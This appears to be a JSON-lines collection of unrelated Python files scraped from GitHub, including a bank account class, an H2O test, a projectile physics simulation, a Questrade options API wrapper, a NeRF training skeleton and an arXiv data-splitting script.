","repo_name":"Neutron-Calibration-in-DUNE/ArrakisND","sub_path":"arrakis_nd/dataset/det_point_cloud.py","file_name":"det_point_cloud.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34426029726","text":"class BankAccount:\r\n def __init__(self, account_number, balance, date_of_opening, customer_name):\r\n self.account_number = account_number\r\n self.balance = balance\r\n self.date_of_opening = date_of_opening\r\n self.customer_name = customer_name\r\n\r\n def deposit(self, amount):\r\n if amount > 0:\r\n self.balance += amount\r\n print(f\"Deposit of Rs. {amount} successful.\")\r\n else:\r\n print(\"Invalid amount. 
Deposit failed.\")\r\n\r\n def withdraw(self, amount):\r\n if amount > 0 and amount <= self.balance:\r\n self.balance -= amount\r\n print(f\"Withdrawal of Rs. {amount} successful.\")\r\n else:\r\n print(\"Insufficient balance. Withdrawal failed.\")\r\n\r\n def check_balance(self):\r\n print(f\"Account balance: Rs. {self.balance}\")\r\n\r\naccount = BankAccount(\"1234567890\", 5000, \"2022-01-01\", \"John Doe\")\r\n\r\naccount.check_balance() \r\n\r\naccount.deposit(2000) \r\naccount.check_balance() \r\n\r\naccount.withdraw(3000) \r\naccount.check_balance() \r\naccount.withdraw(5000) \r\naccount.check_balance() \r\n","repo_name":"pooja4034/Python","sub_path":"Assignment/2.24.py","file_name":"2.24.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13350735214","text":"import sys\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\nsys.path.insert(1,\"../../\")\nfrom h2o.frame import H2OFrame\nfrom tests import pyunit_utils\n\ndef pubdev_6360():\n source = [\n [1, 'Peter', 'blah'],\n [2, 'Carl', ''],\n [3, 'Maria', 'whatever'],\n [4, 'Cindy', None]\n ]\n expected = [\n [1, 'Peter', 1],\n [2, 'Carl', 0],\n [3, 'Maria', 1],\n [4, 'Cindy', 0]\n ]\n columns = ['ID', 'Name', 'testcolumn']\n sourcePandasFrame = pd.DataFrame(source, columns=columns)\n expectedPandasFrame = pd.DataFrame(expected, columns=columns)\n\n h2oFrame = H2OFrame(sourcePandasFrame)\n h2oFrame[h2oFrame['testcolumn'] != '', 'testcolumn'] = '1'\n try:\n h2oFrame[h2oFrame['testcolumn'] == '', 'testcolumn'] = '0'\n assert False, \"H2O Frame operation should fail on an enum column\"\n except Exception as e:\n assert 'Cannot assign value 1 into a vector of type Enum.' == e.args[\n 0].msg, \"H2O Frame operation failed on an unexpected error\"\n\n h2oFrame = H2OFrame(sourcePandasFrame)\n h2oFrame['testcolumn'] = h2oFrame['testcolumn'].ascharacter()\n h2oFrame[h2oFrame['testcolumn'] != '', 'testcolumn'] = '1'\n h2oFrame[h2oFrame['testcolumn'] == '', 'testcolumn'] = '0'\n h2oFrame['testcolumn'] = h2oFrame['testcolumn'].asfactor()\n\n assert_frame_equal(h2oFrame.as_data_frame(use_pandas=True), expectedPandasFrame)\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_6360)\nelse:\n pubdev_6360()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pubdev_6360.py","file_name":"pyunit_pubdev_6360.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"41817057589","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Particle:\n def __init__(self):\n self.t = []\n self.x = []\n self.y = []\n self.vx = []\n self.vy = []\n self.ay =[]\n self.ax = []\n \n def set_initial_conditions(self,x0,y0,kut,v0,p,c,A,m):\n self.t.append(0) \n self.x.append(x0)\n self.y.append(y0)\n self.v_x = v0 * np.cos(np.radians(kut))\n self.v_y = v0 * np.sin(np.radians(kut))\n self.vx.append(self.v_x)\n self.vy.append(self.v_y)\n self.a_x = 0\n self.a_y = 9.81\n self.ay.append(self.a_y)\n self.ax.append(self.a_x)\n self.g = 9.81\n self.dt = 0.01\n self.p = p\n self.c = c\n self.A = A \n self.m = m\n \n def A_f(self,kut):\n return self.A\n\n\n def reset(self):\n self.__init__()\n \n \n def __move(self):\n self.t.append(self.t[-1]+ self.dt)\n self.ax.append(-np.sign(self.vx[-1])*(self.p*self.c*self.A/2*self.m)*self.vx[-1]**2)\n 
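 # vertical update next: gravity plus the same sign-opposed quadratic drag term as used for vx above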
self.ay.append(-self.g-np.sign(self.vy[-1])*(self.p*self.c*self.A/2*self.m)*self.vy[-1]**2)\n self.vy.append(self.vy[-1]+self.ay[-1] * self.dt)\n self.vx.append(self.vx[-1]+self.ax[-1] * self.dt)\n self.x.append(self.x[-1]+self.vx[-1]*self.dt)\n self.y.append(self.y[-1]+self.vy[-1]*self.dt)\n \n \n def range(self,dt=None): # dt is unused; default added so the no-argument call in plot_trajectory works\n while self.y[-1]>=0:\n self.__move()\n return self.x[-1]\n\n def plot_trajectory(self):\n self.range()\n plt.plot(self.x[:-1],self.y[:-1])\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n def a_rk(self,x,v,t):\n return -1*np.sign((v*self.p*self.c*self.A_f(np.radians(np.arctan(self.vy[-1]/self.vx[-1])))/2*self.m)*v**2)\n\n\n def runge_kutta(self):\n i=0\n while self.y[i]>=0:\n\n self.t.append(self.t[i-1]+self.dt)\n k1vx = (self.a_rk(self.x[i-1],self.vx[i-1],self.t[i-1]))*self.dt\n k1x = self.vx[i-1]*self.dt\n k1vy = (-self.g + self.a_rk(self.x[i-1],self.vx[i-1],self.t[i-1]))*self.dt\n k1y = self.vy[i-1]*self.dt\n \n k2vx = (self.a_rk( self.x[i-1]+k1vx/2, self.vx[i-1]+k1vx/2,self.t[i-1]+self.dt/2))*self.dt\n k2x = (self.vx[i-1]+k1vx/2)*self.dt\n k2vy = (-self.g + self.a_rk( self.y[i-1]+k1vy/2, self.vy[i-1]+k1vy/2,self.t[i-1]+self.dt/2))*self.dt\n k2y = (self.vy[i-1]+k1vy/2)*self.dt\n\n k3vx = (self.a_rk(self.x[i-1]+k2vx/2,self.vx[i-1]+k2vx/2,self.t[i-1]+self.dt/2))*self.dt \n k3x = (self.vx[i-1]+k2vx/2)*self.dt\n k3vy = (-self.g + self.a_rk(self.y[i-1]+k2vy/2,self.vy[i-1]+k2vy/2,self.t[i-1]+self.dt/2))*self.dt \n k3y = (self.vy[i-1]+k2vy/2)*self.dt\n\n k4vx = (self.a_rk(self.x[i-1]+k3vx/2,self.vx[i-1]+k3vx/2,self.t[i-1]+self.dt/2))*self.dt\n k4x = (self.vx[i-1]+k3vx/2)*self.dt\n k4vy = (-self.g + self.a_rk( self.y[i-1]+k3vy/2, self.vy[i-1]+k3vy/2,self.t[i-1]+self.dt/2))*self.dt\n k4y = (self.vy[i-1]+k3vy/2)*self.dt\n\n self.vx.append(self.vx[i-1] +1/6*(k1vx + 2*k2vx + 2*k3vx +k4vx))\n self.vy.append(self.vy[i-1] +1/6*(k1vy + 2*k2vy + 2*k3vy +k4vy)) # was k2vy + 2*k2vy + 2*k3vx, which mixed up the RK4 terms\n\n self.x.append(self.x[i-1]+1/6*(k1x + 2*k2x + 2*k3x +k4x))\n self.y.append(self.y[i-1]+1/6*(k1y + 2*k2y + 2*k3y +k4y))\n i+=1\n \n return self.x,self.y\n\n def a_kugla(self,kut):\n return self.stranica**2 * np.pi\n\n def a_kocka(self,kut):\n return self.stranica**2 * np.cos(kut)\n\n def kugla_kocka(self,stranica_a,vrsta='kugla'): # 'kugla'/'kocka' = sphere/cube, 'stranica' = side length (Croatian identifiers kept as-is)\n self.stranica = stranica_a\n if vrsta == 'kugla':\n self.A_f= self.a_kugla\n else:\n self.A_f= self.a_kocka\n return self.runge_kutta()\n \n def meta(self,xm,ym,rm):\n for kut in range(1,90):\n self.set_initial_conditions(0,0,kut,5,0.0001,0.4,2,3)\n pogodeno=0\n xi,yi = self.runge_kutta()\n for i in range (len(xi)):\n if math.dist([ xi[i] ,yi[i]],[xm,ym])< rm:\n pogodeno = 1\n break\n self.reset()\n if pogodeno ==1:\n return kut,xi,yi\n return 0,[],[]\n \n\n\n\n \n \n","repo_name":"ir1is/PAF","sub_path":"vj_6/domaci_4/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32731808543","text":"# https://www.acmicpc.net/problem/1018\n\n\"\"\"\nOnce an 8*8 board section is chosen:\nB first or W first?\nTiles to repaint when B is first\nTiles to repaint when W is first\n\nStore the minimum of the two\n\"\"\"\n\n# a = 'abc'\n# b = 'abb'\n# c = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(a,b)))\n\nrefs = ('BWBWBWBW', 'WBWBWBWB')\n\ndef compare(tar, row):\n compA = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(tar, refs[0])))\n compB = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(tar, refs[1])))\n if row % 2:\n return (compA, compB)\n else:\n return (compB, 
compA)\n\nN, M = map(int, input().split())\n\nboard = []\n\nfor _ in range(N):\n board.append(input())\n\nresult = 64\n\nfor rowOffset in range(N-7):\n for colOffset in range(M-7):\n r = 0\n res = []\n for i in range(8):\n a = board[i+rowOffset][colOffset:colOffset+8]\n res.append(compare(a, i))\n r = min(map(sum, zip(*res)))\n if r < result:\n result = r\n\nprint(result)","repo_name":"ghleokim/codeTestProblems","sub_path":"baekjoon/1018_bruteForce.py","file_name":"1018_bruteForce.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23644203191","text":"#!/usr/bin/env python\n\nimport sys\n\ninp = open(sys.argv[1], \"r\")\nout = open(\"output.txt\", \"w+\")\n\ncount = int(inp.next())\nfor index in range(count):\n result_count = {}\n A, B = map(int, inp.next().split())\n for n in xrange(A, B+1):\n str_n = str(n)\n length = len(str_n)\n for i in xrange(length,0,-1):\n shift_n = int(str_n[i:length]+str_n[0:i])\n if (shift_n >= A) and (shift_n < n):\n for m in xrange(A, n):\n if shift_n == m:\n result_count[(shift_n, n)] = 1\n out.writelines(\"Case #%d: %d\\n\" % (index+1, len(result_count)))\n \ninp.close()\nout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1662.py","file_name":"1662.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20917471177","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\ntry:\n name = input('Ener list of your name here:').title().split(\",\")\n assignments = input('Enter a number of assignments:').split(\",\")\n grades = input('Enter a list of grades:').split(\",\")\n \nexcept ValueError:\n print('That\\s not valid answr!')\n\nmessage = \"Hi {},\\n\\nThis is a reminder that you have {} assignments left to \\\nsubmit before you can graduate. 
Your current grade is {} and can increase \\\nto {} if you submit all assignments before the due date.\\n\\n\"\n\nfor name, assignments, grades in zip(name, assignments, grades):\n    # potential grade: the current grade plus two points per remaining assignment\n    print(message.format(name, assignments, grades, int(grades) + int(assignments) * 2))","repo_name":"munalshah13/Python_Exercises","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27159333729","text":"import argparse\nimport logging\nimport os\nimport sys\nimport time\n\nimport tqdm\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\n\nsys.path.append(os.pardir)\nfrom ioutil import JsonIO\nfrom model import makeModel, makeLossFunction, makeOptimizer, makeScheduer\nfrom dataset import makeTrainLoader, makeValLoader\nfrom option.nerf_opt import parseArgument\n\ndef makeConfig(args: argparse.Namespace) -> dict:\n    assert os.path.exists(args.config), \"Can not find configuration file with path {}\".format(args.config)\n    config = JsonIO.input(args.config)\n    return config\n\ndef main(\n    config: dict,\n    train_loader: DataLoader,\n    model: nn.Module,\n    optimizer: torch.optim.Optimizer,\n    loss_fn,\n    swriter: SummaryWriter,\n    resumed_epoch: int\n):\n    #* constant\n    \n    # NOTE: \"max_epoch\" is an assumed config key for the epoch range\n    for epoch in tqdm.tqdm(range(resumed_epoch, config.get(\"train\", \"max_epoch\")), dynamic_ncols=True):\n        epoch_start_time = time.time()\n\n        model.train()\n        #* batch training\n        batch_loss, batch_vis, batch_time = [], [], []\n        for batch_idx, batch in enumerate(train_loader):\n            batch_start_time = time.time()\n\n            # TODO: here (the forward pass and loss_fn are expected to define loss)\n\n            batch_time.append(time.time() - batch_start_time)\n            batch_loss.append(loss.item())\n\nif __name__ == \"__main__\":\n    args = parseArgument()\n\n    #* set pytorch gpu id and settings\n    torch.cuda.set_device(args.gpu)\n    torch.set_default_dtype(torch.float32)\n    torch.autograd.set_detect_anomaly(True)\n\n    #* loading configuration file\n    config = makeConfig(args)\n\n    #* create ray dataset\n    config.set(\"dataset\", \"clean_ray\", args.clean_ray)\n\n    #* logger and tensorboard writer\n    logger = logging.getLogger(__name__)\n    output_dir = config.get(\"output\", \"output_dir\")\n    swriter = SummaryWriter(log_dir=output_dir, max_queue=1)\n\n    #* create model, optimizer, loss function, scheduler and data loader\n    # TODO: from here\n    model = makeModel(config)\n    loss_fn = makeLossFunction(config)\n    optimizer = makeOptimizer(config, model)\n    train_loader = makeTrainLoader(config)\n    val_loader = makeValLoader(config)\n    scheduler = makeScheduer(config)\n\n    #* load model from checkpoint\n    # TODO: from here\n    if args.resume == 0:\n        # specify the number of iteration\n        resumed_epoch = 0\n    elif args.resume == -1:\n        # find the maximum number of iterations that is saved\n        resumed_epoch = -1\n    else:\n        resumed_epoch = args.resume\n    ckpt_path = os.path.join(output_dir, \"checkpoint_{}.pt\".format(resumed_epoch))\n    \n    # resume from checkpoint\n    if resumed_epoch != 0:\n        assert os.path.exists(ckpt_path), \"Can not find the required checkpoint file: {}.\".format(ckpt_path)\n        logger.info(\"Loading checkpoint from {}, start from {} epoch.\".format(ckpt_path, resumed_epoch))\n\n        ckpt = torch.load(ckpt_path, map_location='cuda:{}'.format(args.gpu))\n        model.load_state_dict(ckpt[\"model\"])\n        optimizer.load_state_dict(ckpt[\"optimizer\"])\n        scheduler.load_state_dict(ckpt[\"scheduler\"])\n    else:\n        logger.info(\"Training from scratch.\")\n\n    main(\n        config, train_loader, model, optimizer, loss_fn, swriter, resumed_epoch\n    )\n\n","repo_name":"ZhaoOfficial/CG","sub_path":"Neural Radiance 
Field/main/nerf.py","file_name":"nerf.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70388385154","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom functools import partial\nimport joblib\nfrom typing import Callable, Dict, Optional\n\nimport numpy as np\nimport optuna\nfrom optuna import Trial\nfrom optuna.pruners import MedianPruner\nfrom optuna.samplers import TPESampler\nimport pandas as pd\nfrom sklearn.utils.validation import check_is_fitted\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom fforma.experiments.base.common import BaseData\nfrom fforma.utils.evaluation import evaluate_panel\n\n\nclass CrossValidation:\n\n    def __init__(self, meta_learner, params: Callable, default_params: Optional[Dict] = {},\n                 metric: Callable = None,\n                 n_splits: int = 5, n_trials: int = 100,\n                 random_seed: int = 1,\n                 save_study_path: Optional[str] = None) -> 'CrossValidation':\n        self.meta_learner = meta_learner\n        self.meta_learner_name = meta_learner.__name__.replace('MetaLearner', '')\n        self.params = params\n        self.default_params = default_params\n        self.metric = metric\n        self.metric_name = metric.__name__\n        self.n_splits = n_splits\n        self.n_trials = n_trials\n        self.random_seed = random_seed\n        self.save_study_path = save_study_path\n\n        self.study = None\n\n    def _fit_meta_learner(self, data: BaseData, params_trial: Dict):\n        if self.meta_learner_name == 'FFNN':\n            params = {**params_trial, **self.default_params}\n            model = self.meta_learner(params).fit(data.features,\n                                                  data.forecasts,\n                                                  data.ground_truth)\n        elif self.meta_learner_name == 'XGBoost':\n            params = {}\n            params['xgb_params'] = params_trial\n            params['n_estimators'] = params['xgb_params']['n_estimators']\n            params = {**params, **self.default_params}\n            model = self.meta_learner(**params).fit(data.features,\n                                                    data.get_metric(self.metric_name))\n        else:\n            raise Exception(f'Unknown meta learner: {self.meta_learner_name}')\n\n        return model\n\n    def _objective(self, trial: Trial, data: BaseData) -> float:\n\n        # Data\n        classes = data.features['unique_id'].str[0].values\n        uids = data.features['unique_id'].values\n\n        #kfold\n        kf = StratifiedKFold(n_splits=self.n_splits,\n                             shuffle=True,\n                             random_state=self.random_seed)\n\n        params_trial = self.params(trial)\n\n        losses = []\n        for step, (idx_train, idx_test) in enumerate(kf.split(uids, classes)):\n            train_data = data.get_ids(uids[idx_train])\n            test_data = data.get_ids(uids[idx_test])\n\n            # Fit the model\n            model = self._fit_meta_learner(train_data, params_trial)\n\n            forecast = model.predict(test_data.features, test_data.forecasts)\n\n            loss_test = evaluate_panel(test_data.ground_truth, forecast, self.metric)\n            intermediate_value = loss_test.mean().values.item()\n            losses.append(intermediate_value)\n\n            #Pruning\n            mean_intermediate_value = np.mean(losses)\n            trial.report(mean_intermediate_value, step)\n\n            # Handle pruning based on the intermediate value.\n            if trial.should_prune():\n                raise optuna.TrialPruned()\n\n        losses = np.array(losses)\n        mean_loss = losses.mean()\n        std_loss = losses.std()\n\n        return mean_loss\n\n    def fit(self, data: BaseData) -> 'CrossValidation':\n\n        objective = partial(self._objective, data=data)\n\n        sampler = TPESampler(seed=self.random_seed)\n        pruner = MedianPruner()\n        study = optuna.create_study(sampler=sampler, pruner=pruner)\n        study.optimize(objective, n_trials=self.n_trials, gc_after_trial=True)\n\n        best_params = self.params(study.best_trial)\n\n        self.study = study\n        if self.save_study_path is 
not None:\n            joblib.dump(study, self.save_study_path)\n\n        self.model_ = self._fit_meta_learner(data, best_params)\n\n        return self\n\n    def predict(self, data: BaseData) -> pd.DataFrame:\n        check_is_fitted(self, 'model_')\n\n        forecast = self.model_.predict(data.features, data.forecasts)\n\n        return forecast\n","repo_name":"FedericoGarza/fforma","sub_path":"fforma/experiments/cross_validation/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"42227430540","text":"import math\r\n#Constants#\r\nc = (2.997925E+8)\r\nh = (6.6262E-34)\r\ne = (1.6022E-19)\r\nE = (8.8542E-12)\r\npi = (math.pi)\r\nme = (9.1095E-31)\r\n#Constants#\r\n\r\n\r\nn=float(input(\"number n=\")) # input n _ normally always 1\r\n\r\nm=float(input(\"number m=\")) # input m _ starting from 2\r\n\r\n\r\nDeltaE = (e**4 * me)/(8 * E**2 * h**2)*(1/n**2 - 1/m**2) # the whole formula\r\n\r\nDeltaEe =DeltaE/e # divide by e to express the result in eV\r\nprint(DeltaEe,\"eV\")\r\n\r\nLogOut = input(\"Exit: press Enter\")\r\n","repo_name":"Deaf-Wolf/AbiPhysics","sub_path":"∆E Rechner.py","file_name":"∆E Rechner.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1562334698","text":"import config\nfrom datetime import datetime\nimport json\nimport math\nimport os\nimport random\nimport time\nfrom questrade_api import Questrade\n\n'''\nTODO:\n- convert _company_check() to decorator\n'''\n\nQUESTRADE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f%z'\n\nclass QuestradeTickerOptions(Questrade):\n\n    def __init__(self, refresh_token = None, auto_refresh = True):\n        if auto_refresh:\n            if refresh_token is not None:\n                raise Exception(\n                    ('Provide a refresh token OR request an auto-refresh from '\n                     'stored config, NOT both.'))\n            with open(os.path.expanduser('~/.questrade.json'), 'r') as QF:\n                refresh_token = json.load(QF)['refresh_token']\n        if refresh_token is None:\n            raise Exception(\n                ('Either a valid refresh token or a request for auto-refresh '\n                 'are required'))\n\n        super().__init__(refresh_token=refresh_token)\n        self.__company_meta = None\n\n    def _overload_robust_request(self, fn, *args, **kwargs):\n        '''\n        There are times when we might overload the server with requests,\n        probably when there are multiple threads running. 
To combat this, make\n        requests robust to server overload\n        '''\n        result = None\n\n        while True:\n            result = fn(*args, **kwargs)\n            try:\n                if result['code'] == 1006:\n                    # Yup, that's some overload\n                    time.sleep(random.random())\n                    continue\n            except KeyError:\n                # No 'code' key implies that we're good to go\n                break\n\n        return result\n\n    def _parse_symbols(self, ticker):\n        '''\n        Basically an error-checking wrapper for symbols_search, since we still\n        need to choose from the companies returned by the API\n        '''\n        company_meta = None\n\n        companies = self._overload_robust_request(\n            self.symbols_search, prefix=ticker.upper() )['symbols']\n        for c in companies:\n            if c['symbol'] == ticker:\n                company_meta = c\n                break\n\n        if company_meta is None:\n            raise Exception(\n                'No company exists with the exact ticker {}'.format(ticker))\n\n        return company_meta\n\n    def _company_check(self):\n        if self.__company_meta is None:\n            raise Exception(\n                ('This operation requires a company to have been loaded via '\n                 'load_company().'))\n\n    def get_server_datetime(self):\n        return datetime.strptime(self.time['time'], QUESTRADE_TIME_FORMAT)\n\n    def get_timezone(self):\n        return self.get_server_datetime().tzinfo\n\n    def load_company(self, ticker):\n        # There may be many different objects making requests simultaneously, so\n        # we want to attempt to stagger them with ticker-dependent random waits\n        random.seed(sum((ord(ch) for ch in ticker)) + time.time())\n        self.__company_meta = self._parse_symbols(ticker)\n\n\n    def get_security_price(self):\n        self._company_check()\n\n        response = self._overload_robust_request(\n            self.markets_quote, self.__company_meta['symbolId'])\n\n        current_info = None\n        for info in response['quotes']:\n            if info['symbol'] == self.__company_meta['symbol']:\n                current_info = info\n                break\n\n        if current_info is None:\n            raise Exception(\n                'Could not find current quote for {}. 
Exiting.'.format(\n self.__company_meta['symbol']))\n\n return current_info['lastTradePrice']\n\n def get_options(self):\n '''\n return format:\n {\n :\n {\n : {\n 'type': ['C','P'],\n 'strike': ,\n ,\n },\n ...\n },\n ...\n }\n '''\n self._company_check()\n\n options = {}\n\n code = self.__company_meta['symbolId']\n\n # load up all the available options metadata\n options_meta = self._overload_robust_request(\n self.symbol_options, code)['optionChain']\n\n for ex in options_meta:\n new_ex = {}\n ex_date = ex['expiryDate']\n\n # Once we've found the data, we don't care about the minutiae of the\n # timezone and milliseconds\n dir_date = str(\n datetime.strptime(ex_date, QUESTRADE_TIME_FORMAT).date())\n\n # Gather up the series for this expiry.\n quotes = self._overload_robust_request(\n self.markets_options,\n filters=[{'underlyingId': code,'expiryDate': ex_date}]\n )['optionQuotes']\n\n # We reformulate as a dict keyed by the symbolId to make it easier\n # to load in the data in the inner compiling loop below\n series_data = {op['symbolId']: op for op in quotes}\n\n for s in ex['chainPerRoot'][0]['chainPerStrikePrice']:\n for op_type in ('call', 'put'):\n op_id = s[op_type + 'SymbolId']\n new_ex[op_id] = {\n 'type': op_type[0].upper(),\n 'strike': s['strikePrice'],\n 'data': series_data[op_id]\n }\n\n options[dir_date] = new_ex\n\n return options\n","repo_name":"cancub/options-model","sub_path":"questrade_options_api.py","file_name":"questrade_options_api.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15647911883","text":"from pathlib import Path\nfrom tqdm import tqdm\nimport json\n\nSRC_FILE = \"/home/suehyun/datasets/arxiv/arxiv-metadata-oai-snapshot.json\"\nTRAIN_DIR = \"/home/suehyun/datasets/arxiv-splits/time_stratified_train\"\nVALIDATION_DIR = \"/home/suehyun/datasets/arxiv-splits/time_stratified_validation\"\nTEST_DIR = \"/home/suehyun/datasets/arxiv-splits/test\"\nREF_DIR = \"/home/suehyun/workspace/model/emerging-new-words/splits/arxiv\"\n\ndef print_title(title: str):\n print(\"=\" * 80)\n print(title)\n print(\"=\" * 80)\n \ndef get_target_docs(split: str) -> dict():\n print_title(f\"Parse target docs for {split} split ...\")\n target_docs = dict()\n \n if split == \"test\":\n split_path = Path(REF_DIR, split)\n else:\n split_path = Path(REF_DIR, \"time_stratified_\" + split)\n with split_path.open('r') as f:\n while True:\n line = f.readline()\n if not line:\n break\n date, doc_id = line.strip().split('\\t')\n target_docs[doc_id] = date\n print(f\"Length of {split} target docs: {len(target_docs)}\\n\")\n return target_docs\n\ndef write_data(write_dir: Path, date: str, doc_id: str, abstract: str):\n doc_id = doc_id.replace('/', '=') # file names do not allow slashes, e.g., \"solv-int/9812025\"\n abstract = abstract.strip().replace('\\n', ' ')\n \n file_name = date + '_' + doc_id + \".txt\"\n write_path = write_dir / file_name\n with write_path.open('w') as f:\n f.write(abstract)\n write_path.chmod(0o444) # read-only\n\ndef parse_then_move_files(train_target: dict, validation_target: dict, test_target: dict):\n print_title(\"Start parsing json and move files ...\")\n src_file_path = Path(SRC_FILE)\n \n train_dir_path = Path(TRAIN_DIR)\n validation_dir_path = Path(VALIDATION_DIR)\n test_dir_path = Path(TEST_DIR)\n \n with open(src_file_path) as f:\n for line in tqdm(f):\n meta_data = json.loads(line)\n doc_id = meta_data[\"id\"]\n abstract = meta_data[\"abstract\"]\n \n 
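# Each doc_id key is looked up in O(1) and popped on its first match, so\n            # every abstract is routed to at most one split and the remaining\n            # lookup dicts shrink as the scan proceeds.\n            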
if train_target.get(doc_id): # amortized O(1) time complexity\n write_data(train_dir_path, train_target.pop(doc_id), doc_id, abstract)\n elif validation_target.get(doc_id):\n write_data(validation_dir_path, validation_target.pop(doc_id), doc_id, abstract)\n elif test_target.get(doc_id):\n write_data(test_dir_path, test_target.pop(doc_id), doc_id, abstract)\n \n try:\n assert len(train_target) == 0\n except:\n print(\"Missing train docs\", sorted(list(train_target)))\n \n try:\n assert len(validation_target) == 0\n except:\n print(\"Missing validation docs\", sorted(list(validation_target)))\n \n try:\n assert len(test_target) == 0\n except:\n print(\"Missing test docs\", sorted(list(test_target)))\n\nif __name__ == \"__main__\":\n train_target = get_target_docs(\"train\")\n validation_target = get_target_docs(\"validation\")\n test_target = get_target_docs(\"test\")\n parse_then_move_files(train_target, validation_target, test_target)\n ","repo_name":"suehyunpark/emerging-new-words","sub_path":"src/arxiv/1-split.py","file_name":"1-split.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34934052369","text":"import fridge.Constituent.Constituent as Constituent\nimport fridge.utilities.mcnpCreatorFunctions as mcnpCF\n\n\nclass FuelBond(Constituent.Constituent):\n \"\"\"Creates the bond material between the fuel and the inner cladding.\"\"\"\n def __init__(self, unit_info):\n super().__init__(unit_info)\n self.radius = 0\n self.height = 0\n self.fuelSurfaceNum = 0\n self.get_material_card(unit_info[0][3])\n self.make_component(unit_info[1])\n\n def make_component(self, bond_info):\n self.radius = bond_info[0] / 2\n self.height = bond_info[1]\n self.fuelSurfaceNum = bond_info[2]\n surface_comment = \"$Pin: Bond - 1% higher than fuel\"\n cell_comment = \"$Pin: Bond\"\n self.surfaceCard = mcnpCF.build_right_circular_cylinder_surface(self.radius, self.height, self.position,\n self.surfaceNum, surface_comment)\n self.cellCard = mcnpCF.build_concentric_cell(self.cellNum, self.materialNum, self.material.atomDensity,\n self.fuelSurfaceNum, self.surfaceNum, self.universe, cell_comment)\n","repo_name":"ryanstwrt/FRIDGe","sub_path":"fridge/Constituent/FuelBond.py","file_name":"FuelBond.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12113660638","text":"import pygame\nimport random\n\nclass Brick:\n def __init__(self, pos, wh, code, toughscore = 1):\n self.col_w_h = wh\n half_x = wh[0]/2\n half_y = wh[1]/2\n self.pos = [pos[0] + 135, pos[1] + 120]\n self.top_point = (self.pos[0] + half_x, self.pos[1])\n self.bottom_point = (self.pos[0] + half_x, self.pos[1] + wh[1])\n self.right_point = (self.pos[0] + wh[0], self.pos[1] + half_y)\n self.left_point = (self.pos[0], self.pos[1] + half_y)\n self.rect = pygame.Rect(self.pos[0], self.pos[1], wh[0], wh[1])\n self.code = code\n self.powerup = None\n self.toughness = toughscore\n if random.randint(0, 100) == 100:\n ran = random.randint(0, 1)\n if ran == 0:\n self.powerup = \"Heavy\"\n elif ran == 1:\n self.powerup = \"Speed\"\n\n def get_rect(self):\n return self.rect","repo_name":"fahreradam/Pixel-Break","sub_path":"Pixel Break/bricks.py","file_name":"bricks.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18542182419","text":"from django.urls 
